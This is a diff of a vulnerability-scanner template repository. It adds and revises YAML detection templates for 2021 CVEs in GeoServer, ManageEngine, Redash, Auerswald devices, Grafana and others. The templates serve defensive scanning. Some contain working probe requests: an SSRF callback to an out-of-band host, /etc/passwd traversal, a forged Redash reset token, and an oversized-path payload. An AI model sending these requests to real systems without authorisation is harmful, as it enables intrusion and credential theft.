AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://{{interactsh-url}}/' + - '{{BaseURL}}/?unix:{{repeat("A", 7701)}}|http://interact.sh/' redirects: true max-redirects: 2 matchers: - type: word - part: interactsh_protocol words: - - "http" # Confirms HTTP Interaction \ No newline at end of file + - "Interactsh Server" + + +# Enhanced by mp on 2022/04/22 diff --git a/cves/2021/CVE-2021-40539.yaml b/cves/2021/CVE-2021-40539.yaml index bf8c66917d..685aa50014 100644 --- a/cves/2021/CVE-2021-40539.yaml +++ b/cves/2021/CVE-2021-40539.yaml @@ -1,22 +1,22 @@ id: CVE-2021-40539 info: - name: ManageEngine ADSelfService Plus version 6113 Unauthenticated RCE + name: Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution author: daffainfo,pdteam severity: critical - description: ManageEngine ADSelfService Plus version 6113 and prior are vulnerable to a REST API authentication bypass which leads to remote code execution. - remediation: Upgrade to ADSelfService Plus build 6114. + description: Zoho ManageEngine ADSelfService Plus version 6113 and prior are vulnerable to a REST API authentication bypass vulnerability that can lead to remote code execution. reference: - https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis - https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539 - https://github.com/synacktiv/CVE-2021-40539 - tags: cve,cve2021,rce,ad,intrusive + - https://nvd.nist.gov/vuln/detail/CVE-2021-40539 + remediation: Upgrade to ADSelfService Plus build 6114. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2021-40539 cwe-id: CWE-287 + tags: cve,cve2021,rce,ad,intrusive,manageengine requests: @@ -112,3 +112,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/18 diff --git a/cves/2021/CVE-2021-40542.yaml b/cves/2021/CVE-2021-40542.yaml index ca8d260c4f..247ec475a8 100644 --- a/cves/2021/CVE-2021-40542.yaml +++ b/cves/2021/CVE-2021-40542.yaml @@ -1,17 +1,18 @@ id: CVE-2021-40542 info: - name: Opensis-Classic 8.0 Reflected XSS + name: Opensis-Classic 8.0 - Reflected Cross-Site Scripting author: alph4byt3 severity: medium - description: Opensis-Classic Version 8.0 is affected by cross-site scripting (XSS). An unauthenticated user can inject and execute JavaScript code through the link_url parameter in Ajax_url_encode.php. + description: | + Opensis-Classic Version 8.0 is affected by cross-site scripting. An unauthenticated user can inject and execute JavaScript code through the link_url parameter in Ajax_url_encode.php. reference: - https://github.com/OS4ED/openSIS-Classic/issues/189 - https://nvd.nist.gov/vuln/detail/CVE-2021-40542 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-38704 + cvss-score: 6.1 + cve-id: CVE-2021-40542 cwe-id: CWE-79 tags: xss,cve,cve2021,opensis @@ -35,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/18 diff --git a/cves/2021/CVE-2021-40822.yaml b/cves/2021/CVE-2021-40822.yaml new file mode 100644 index 0000000000..e9f58064ff --- /dev/null +++ b/cves/2021/CVE-2021-40822.yaml @@ -0,0 +1,45 @@ +id: CVE-2021-40822 + +info: + name: Geoserver - SSRF + author: For3stCo1d + severity: high + description: GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows SSRF via the option for setting a proxy host. + reference: + - https://gccybermonks.com/posts/cve-2021-40822/ + - https://github.com/geoserver/geoserver/compare/2.19.2...2.19.3 + - https://nvd.nist.gov/vuln/detail/CVE-2021-40822 + - https://github.com/geoserver/geoserver/releases + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-40822 + cwe-id: CWE-918 + metadata: + fofa-query: app="GeoServer" + verified: "true" + tags: cve2021,ssrf,geoserver,cve + +requests: + - raw: + - | + POST /geoserver/TestWfsPost HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_hf_0=&url=http://{{interactsh-url}}/geoserver/../&body=&username=&password= + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + + - type: word + words: + - "" + + - type: status + status: + - 200 diff --git a/cves/2021/CVE-2021-40856.yaml b/cves/2021/CVE-2021-40856.yaml index ab8b50aadd..3499f2bcd8 100644 --- a/cves/2021/CVE-2021-40856.yaml +++ b/cves/2021/CVE-2021-40856.yaml @@ -3,12 +3,19 @@ id: CVE-2021-40856 info: name: Auerswald COMfortel 1400/2600/3600 IP - Authentication Bypass author: gy741 - severity: medium - description: Inserting the prefix "/about/../" allows bypassing the authentication check for the web-based configuration management interface. This enables attackers to gain access to the login credentials used for authentication at the PBX, among other data. + severity: high + description: Auerswald COMfortel 1400/2600/3600 IP is susceptible to an authentication bypass vulnerability. Inserting the prefix "/about/../" allows bypassing the authentication check for the web-based configuration management interface. This enables attackers to gain access to the login credentials used for authentication at the PBX, among other data. reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-40856 - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-004/-auerswald-comfortel-1400-2600-3600-ip-authentication-bypass - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40856 - tags: cve,cve2021,comfortel,auth-bypass + - https://www.redteam-pentesting.de/en/advisories/-advisories-publicised-vulnerability-analyses + - http://packetstormsecurity.com/files/165162/Auerswald-COMfortel-1400-2600-3600-IP-2.8F-Authentication-Bypass.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-40856 + cwe-id: CWE-287 + tags: cve,cve2021,comfortel,auth-bypass,auerswald requests: - raw: @@ -35,3 +42,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/16 diff --git a/cves/2021/CVE-2021-40859.yaml b/cves/2021/CVE-2021-40859.yaml new file mode 100644 index 0000000000..6a3d2f6cf0 --- /dev/null +++ b/cves/2021/CVE-2021-40859.yaml @@ -0,0 +1,45 @@ +id: CVE-2021-40859 + +info: + name: Auerswald COMpact 5500R 7.8A and 8.0B Devices Backdoor + author: pussycat0x + severity: critical + description: Auerswald COMpact 5500R 7.8A and 8.0B devices contain an unauthenticated endpoint ("https://192.168.1[.]2/about_state"), enabling the bad actor to gain backdoor access to a web interface that allows for resetting the administrator password. + reference: + - https://thehackernews.com/2021/12/secret-backdoors-found-in-german-made.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-40859 + - https://www.redteam-pentesting.de/en/advisories/-advisories-publicised-vulnerability-analyses + - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-007/-auerswald-compact-multiple-backdoors + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-40859 + metadata: + fofa-dork: '"auerswald"' + tags: cve,cve2021,iot,unauth,voip,auerswald + +requests: + - method: GET + path: + - "{{BaseURL}}/about_state" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"pbx"' + - '"dongleStatus":0' + - '"macaddr"' + condition: and + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/16 diff --git a/cves/2021/CVE-2021-40868.yaml b/cves/2021/CVE-2021-40868.yaml index c688da0f0f..38c1061e72 100644 --- a/cves/2021/CVE-2021-40868.yaml +++ b/cves/2021/CVE-2021-40868.yaml @@ -1,19 +1,22 @@ id: CVE-2021-40868 info: - name: Cloudron 6.2 Cross Site Scripting + name: Cloudron 6.2 Cross-Site Scripting author: daffainfo severity: medium - description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to Reflected XSS. + description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to cross-site scripting. reference: - https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2021-40868 - tags: cve,cve2021,xss,cloudron + - https://packetstormsecurity.com/files/164183/Cloudron-6.2-Cross-Site-Scripting.html + - https://www.cloudron.io/ + remediation: Upgrade to Cloudron 6.3 or higher. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-40868 cwe-id: CWE-79 + tags: cve,cve2021,xss,cloudron requests: - method: GET @@ -35,3 +38,5 @@ requests: words: - '' part: body + +# Enhanced by mp on 2022/03/06 diff --git a/cves/2021/CVE-2021-40870.yaml b/cves/2021/CVE-2021-40870.yaml index a7237d6d7c..4bbb200201 100644 --- a/cves/2021/CVE-2021-40870.yaml +++ b/cves/2021/CVE-2021-40870.yaml @@ -1,19 +1,20 @@ id: CVE-2021-40870 info: - name: Aviatrix Controller 6.x before 6.5-1804.1922. RCE + name: Aviatrix Controller 6.x before 6.5-1804.1922 Remote Command Execution author: pikpikcu severity: critical - description: Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal. + description: Aviatrix Controller 6.x before 6.5-1804.1922 contains a vulnerability that allows unrestricted upload of a file with a dangerous type, which allows an unauthenticated user to execute arbitrary code via directory traversal. reference: + - https://docs.aviatrix.com/HowTos/UCC_Release_Notes.html#security-note-9-11-2021 - https://wearetradecraft.com/advisories/tc-2021-0002/ - https://nvd.nist.gov/vuln/detail/CVE-2021-40870 - tags: cve,cve2021,rce,aviatrix classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2021-40870 cwe-id: CWE-434 + tags: cve,cve2021,rce,aviatrix requests: - raw: @@ -41,3 +42,5 @@ requests: - "PHP Extension" - "PHP Version" condition: and + +# Enhanced by mp on 2022/03/06 diff --git a/cves/2021/CVE-2021-40875.yaml b/cves/2021/CVE-2021-40875.yaml index 4144e75270..cc9e633024 100644 --- a/cves/2021/CVE-2021-40875.yaml +++ b/cves/2021/CVE-2021-40875.yaml @@ -1,20 +1,23 @@ id: CVE-2021-40875 info: - name: Gurock TestRail Application files.md5 exposure + name: Gurock TestRail Application files.md5 Exposure author: oscarintherocks - severity: medium - description: Improper Access Control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths. The corresponding file paths can be tested, and in some cases, result in the disclosure of hardcoded credentials, API keys, or other sensitive data. - tags: cve,cve2021,exposure,gurock,testrail + severity: high + description: Improper access control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths which can then be tested, and in some cases result in the disclosure of hardcoded credentials, API keys, or other sensitive data. reference: - https://github.com/SakuraSamuraii/derailed - https://johnjhacking.com/blog/cve-2021-40875/ - https://www.gurock.com/testrail/tour/enterprise-edition - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40875 + - htttps://github.com/SakuraSamuraii/derailed + - https://johnjhacking.com/blog/cve-2021-40875/ + - https://www.gurock.com/testrail/tour/enterprise-edition + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40875 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2021-40875 + cwe-id: CWE-863 metadata: shodan-query: https://www.shodan.io/search?query=TestRail + tags: cve,cve2021,exposure,gurock,testrail requests: - method: GET @@ -34,3 +37,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/06 diff --git a/cves/2021/CVE-2021-40960.yaml b/cves/2021/CVE-2021-40960.yaml index cca0c1c98f..f33d6c71e4 100644 --- a/cves/2021/CVE-2021-40960.yaml +++ b/cves/2021/CVE-2021-40960.yaml @@ -1,19 +1,20 @@ id: CVE-2021-40960 info: - name: Galera WebTemplate 1.0 – Directory Traversal + name: Galera WebTemplate 1.0 Directory Traversal author: daffainfo severity: critical description: Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow. reference: - http://www.omrylmz.com/galera-webtemplate-1-0-directory-traversal-vulnerability-cve-2021-40960/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40960 - tags: cve,cve2021,lfi + - http://www.galera.com.tr/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2021-40960 cwe-id: CWE-22 + tags: cve,cve2021,lfi requests: - method: GET @@ -25,8 +26,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/06 diff --git a/cves/2021/CVE-2021-40978.yaml b/cves/2021/CVE-2021-40978.yaml index 81ec5d959e..34a4663e8d 100644 --- a/cves/2021/CVE-2021-40978.yaml +++ b/cves/2021/CVE-2021-40978.yaml @@ -1,19 +1,20 @@ id: CVE-2021-40978 info: - name: mkdocs 1.2.2 built-in dev-server allows directory traversal + name: MKdocs 1.2.2 - Directory Traversal author: pikpikcu severity: high + description: The MKdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain sensitive information. Note the vendor has disputed the vulnerability (see references) because the dev server must be used in an unsafe way (namely public) to have this vulnerability exploited. reference: + - https://github.com/mkdocs/mkdocs/pull/2604 - https://github.com/nisdn/CVE-2021-40978 - https://nvd.nist.gov/vuln/detail/CVE-2021-40978 - tags: cve,cve2021,mkdocs,lfi - description: "** DISPUTED ** The mkdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain :sensitive information. NOTE: the vendor has disputed this as described in https://github.com/mkdocs/mkdocs/issues/2601.] and https://github.com/nisdn/CVE-2021-40978/issues/1." classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2021-40978 cwe-id: CWE-22 + tags: cve,cve2021,mkdocs,lfi requests: - method: GET @@ -31,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/20 diff --git a/cves/2021/CVE-2021-41174.yaml b/cves/2021/CVE-2021-41174.yaml index 241b7b0b94..348eadf47e 100644 --- a/cves/2021/CVE-2021-41174.yaml +++ b/cves/2021/CVE-2021-41174.yaml @@ -1,21 +1,24 @@ id: CVE-2021-41174 info: - name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering XSS + name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering Cross-Site Scripting author: pdteam severity: medium description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions. reference: - https://github.com/grafana/grafana/security/advisories/GHSA-3j9m-hcv9-rpj8 - https://nvd.nist.gov/vuln/detail/CVE-2021-41174 - tags: cve,cve2021,grafana,xss - metadata: - shodan-query: title:"Grafana" + - https://github.com/grafana/grafana/commit/3cb5214fa45eb5a571fd70d6c6edf0d729983f82 + - https://github.com/grafana/grafana/commit/31b78d51c693d828720a5b285107a50e6024c912 + remediation: Upgrade to 8.2.3 or higher. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-41174 cwe-id: CWE-79 + metadata: + shodan-query: title:"Grafana" + tags: cve,cve2021,grafana,xss requests: - method: GET @@ -43,4 +46,6 @@ requests: - type: regex group: 1 regex: - - '"subTitle":"Grafana ([a-z0-9.]+)' \ No newline at end of file + - '"subTitle":"Grafana ([a-z0-9.]+)' + +# Enhanced by mp on 2022/03/06 diff --git a/cves/2021/CVE-2021-41192.yaml b/cves/2021/CVE-2021-41192.yaml new file mode 100644 index 0000000000..dba2a044ba --- /dev/null +++ b/cves/2021/CVE-2021-41192.yaml @@ -0,0 +1,41 @@ +id: CVE-2021-41192 + +info: + name: Redash Setup Configuration - Default Secrets Disclosure + author: bananabr + severity: medium + description: Redash Setup Configuration is vulnerable to default secrets disclosure (Insecure Default Initialization of Resource). If an admin sets up Redash versions <=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value. + reference: + - https://hackerone.com/reports/1380121 + - https://github.com/getredash/redash/security/advisories/GHSA-g8xr-f424-h2rv + - https://nvd.nist.gov/vuln/detail/CVE-2021-41192 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N + cvss-score: 6.5 + cve-id: CVE-2021-41192 + cwe-id: CWE-1188 + metadata: + shodan-query: http.favicon.hash:698624197 + tags: cve,cve2021,redash,auth-bypass + +requests: + - method: GET + path: + - "{{BaseURL}}/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs" + - "{{BaseURL}}/redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Enter your new password:" + - "redash" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/23 diff --git a/cves/2021/CVE-2021-41266.yaml b/cves/2021/CVE-2021-41266.yaml index 37b62119d8..5aed4ef4ea 100644 --- a/cves/2021/CVE-2021-41266.yaml +++ b/cves/2021/CVE-2021-41266.yaml @@ -5,17 +5,20 @@ info: author: alevsk severity: critical description: | - Minio console is a graphical user interface for the for MinIO operator. Minio itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled. All users on release v0.12.2 and before are affected and are advised to update to 0.12.3 or newer. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes service account token. + MinIO Console is a graphical user interface for the for MinIO Operator. MinIO itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-41266 - https://github.com/minio/console/security/advisories/GHSA-4999-659w-mq36 - https://github.com/minio/console/pull/1217 - tags: cve,cve2021,minio classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - 